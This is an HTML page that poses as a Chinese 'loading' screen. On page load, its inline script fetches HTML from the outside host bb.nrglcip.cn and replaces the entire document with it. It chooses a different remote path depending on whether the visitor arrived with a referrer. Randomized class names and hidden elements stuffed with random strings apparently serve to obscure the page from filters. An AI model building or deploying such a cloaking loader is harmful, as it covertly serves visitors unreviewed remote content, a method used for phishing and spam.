<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Yj8DXeW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Yj8DXeW .GOtF5B2G {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Yj8DXeW .content {
            line-height: 50px;
            text-align: center
        }

        .Yj8DXeW .img {
            width: 100%
        }

        .Yj8DXeW .M94iRg {
            text-align: center
        }

        .Yj8DXeW .M94iRg span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Yj8DXeW .M94iRg span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Yj8DXeW .M94iRg span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Yj8DXeW .M94iRg span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Yj8DXeW .M94iRg span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Yj8DXeW .M94iRg span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Yj8DXeW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function I3ePfvMH2Kr(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var OJ0jHD = I3ePfvMH2Kr('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ OJ0jHD +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ OJ0jHD +".html?a=share";
		}
		
        MBkJhR=url+"#"+new Date().getTime();
        MBkJhR && function() {
            $.get(MBkJhR, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >vLq7uhPSiWimrIKO2IGJ5XhuYgpaklID</li>
<a  href='#' style='display:none'>txnGPNHupSDrVd9i4wiLq5aVdErFotQ2</a>
<h1 style='display:none' >hR3qKOpFN5IHEC0qr8ZssxfeKNkuxSnBpxmO5fKP4FCEe9nW5ihpg1gP2IGz</h1>
<img  src='' style='display:none'>
<div style='display:none'>R8pZKopGq7C6Z2Dpn3vwCE4tCA47fXOkpD4sratDln1yIqNYRaQL2</div>
<p  style='display:none'>H8QtIE0WIdutfBBdG8LP5RajzIdR9ctBleTsObDYgZG4</p>
<img  src='' style='display:none'>
<ul style='display:none' >mhGq8Ij509R1Duss5CehlZSyVycB512Js7j5uino3nWLMnNtiz8odoB3O0WD5tBGVdMIi0AQTMM3vW</ul><div class="Yj8DXeW">
    <div class="GOtF5B2G">
        <div class="M94iRg">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>mOhbLoJAmFDQcgePXHbA1hbgJPxb0usImPc4fEqJonDDDxxCEGrEU10VGuS8aLYWEa7hLKRe7UYHhb9io</span>
<b style='display:none' >Q8Bpsg6RKC25IhMqNGJDUgwO5gLJPXJS3kfO9FdbupEe6t</b>
<span style='display:none'>mOhbLoJAmFDQcgePXHbA1hbgJPxb0usImPc4fEqJonDDDxxCEGrEU10VGuS8aLYWEa7hLKRe7UYHhb9io</span>
<h1 style='display:none' >Y8xoXDmlL4SPNjehXzuYavsx1kCVit1qw2VjckoOhJMPYEazkAsvDUq219z0oj</h1>
<h1 style='display:none' >Y8xoXDmlL4SPNjehXzuYavsx1kCVit1qw2VjckoOhJMPYEazkAsvDUq219z0oj</h1>
<b style='display:none' >Q8Bpsg6RKC25IhMqNGJDUgwO5gLJPXJS3kfO9FdbupEe6t</b>
<b style='display:none' >Q8Bpsg6RKC25IhMqNGJDUgwO5gLJPXJS3kfO9FdbupEe6t</b></body>
</html>